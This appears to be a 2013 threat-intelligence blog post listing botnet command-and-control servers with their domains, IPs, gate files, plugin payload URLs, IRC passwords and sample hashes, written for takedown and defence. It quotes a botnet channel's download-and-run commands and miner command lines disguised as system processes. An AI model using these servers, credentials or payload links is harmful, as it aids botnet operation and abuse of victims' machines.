Server: 178.79.183.247, 50.2.193.199, 94.229.66.97
Port: 65112
Current global users: 2898, Max: 2988
Channel: ##hug##
Topic for ##hug## is: .advscan->random->b root dreambox
Topic for ##hug## set by gaspolo at Fri May 31 13:36:47 2013
Oper: [GaSp`ZzzZ] (~g45p0@5.144.173.5): g45p0
[GaSp`ZzzZ] irc.primo.org :Yet another IRC Server running on Debian GNU/Linux
[GaSp`ZzzZ] idle 181:02:12, signon: Thu May 30 22:19:39
[GaSp`ZzzZ] End of WHOIS
cthulhuhf.net (Betabot http botnet hosted by warez-host.com)
Resolved cthulhuhf.net to 91.223.82.43
Server: cthulhuhf.net
Gate file: /misc/order.php
Alternate domains: cthulhuhf.eu cthulhuhf.org.uk cthulhuhf.co.uk cthulhuhf.xxx
Hosting infos: http://whois.domaintools.com/91.223.82.43
Related md5s (search on malwr.com to download the samples): Beta bot: aa07b845981ba53b6100dba745ba5c1a
www.mydowncenter.me (Andromeda http botnet hosted by pw-service.com)
Resolved www.mydowncenter.me to 37.0.122.132
Server: www.mydowncenter.me
Gate file: /andro/image.php
Plugins:
Rootkit: hxxp://www.mydowncenter.me/andro/r.pack
Socks: hxxp://www.mydowncenter.me/andro/s.pack
Formgrabber: hxxp://www.mydowncenter.me/andro/f.pack
Formgrabber gate file: /andro/fg.php
Hosting infos: http://whois.domaintools.com/37.0.122.132
Related md5s (search on malwr.com to download the samples): Andromeda: a26ffa2c7bd0e7899b04768f9e76a938
s5.6d6f6e65797072696e746572.com (Betabot http botnet hosted by infiumhost.com)
Resolved s5.6d6f6e65797072696e746572.com to 188.190.127.160
Server: s5.6d6f6e65797072696e746572.com
Gate file: /wp-admin/order.php
Alternate domains: ripraktec147.com youdbeproud228.com wyomiriding928.com
Mining info: svchost.exe -I 100 -T 200 -t 2 -o stratum+tcp://s2.6d6f6e65797072696e746572.com:3333 -u mp187.her -p lex
Hosting infos: http://whois.domaintools.com/188.190.127.160
Related md5s (search on malwr.com to download the samples): Betabot: db9a816d58899f1ba92bc338e89f856a
blackhats.su (Betabot http botnet proxied by cloudflare)
Server: blackhats.su
Gate file: /bb/order.php
Alternate domains: aeonhf.net aeonhf.me
You may recognize one of the domains, as it has appeared on the blog before. They used Cloudflare that time as well. Let's see if we can get Cloudflare to block access to it again.
Related md5s (search on malwr.com to download the samples): Beta bot:
breathespacesfacebook.org (Socks5Masterz botnet hosted by burst.net)
Resolved breathespacesfacebook.org to 46.37.162.26
Server: breathespacesfacebook.org
Gate file: /gate.php
Alternate domains: tweaksights.org gotoguydreamed.org percussiontasked.org tenmileage.org
Hosting infos: http://whois.domaintools.com/46.37.162.26
Related md5s (search on malwr.com to download the samples): Proxy bot: 7dc68e49d035107d132e19adf9f23d3b
t.baerr01.com (Ngrbot irc botnet hosted by Chinanet)
Resolved t.baerr01.com to 122.195.244.35, 60.172.229.40, 60.169.73.119, 121.14.212.125, 121.12.123.140, 124.232.150.181, 222.88.194.187
Server: t.baerr01.com
Port: 6512
Server password: smart
Channel: #dpi
Topic (raw RPL_TOPIC line): :hub.us.com 332 n[US{XPu{pwvvvwa #dpi :!mdns hxxp://146.185.246.192/av.txt !dl hxxp://146.185.246.192/111.exe !dl hxxp://146.185.246.192/brentback.exe !dl hxxp://146.185.246.192/dqw7.exe
Channel: #tar
Channel password: smart
A modified ircd is used, making it difficult to connect using a regular IRC client.
Related md5s (search on malwr.com to download the samples):
www.welovegiveaways.net (Andromeda http botnet hosted by enzu.com)
Resolved www.welovegiveaways.net to 199.229.235.250
Server: www.welovegiveaways.net
Gate file: /justricewithwater/image.php
Plugins:
Rootkit: hxxp://www.welovegiveaways.net/justricewithwater/r.pack
Bitcoin mining info:
Shell.exe -o stratum+tcp://stratum.bitcoin.cz:3333 -u vovler.split1 -p none -t 0 -I 10
macromedia.exe -o stratum+tcp://stratum.bitcoin.cz:3333 -u vovler.split1 -p none -g no
Hosting infos: http://whois.domaintools.com/199.229.235.250
knwns.de (Betabot http botnet hosted by balticservers.com)
Resolved knwns.de to 5.199.166.226
Server: knwns.de
Gate file: /bst/order.php
Hosting infos: http://whois.domaintools.com/5.199.166.226
toxhoster.net (Pony loader hosted by ecatel.net)
Resolved toxhoster.net to 80.82.79.35
Server: toxhoster.net
Gate file: /forum/gate.php
Some idiot set it to download itself from the server, so it will run in an endless loop of stealing passwords, sending logs, and then downloading and running itself.
Hosting infos: http://whois.domaintools.com/80.82.79.35
Related md5s (search on malwr.com to download the samples): b22258989a5e93d4cb1c3960441c1c06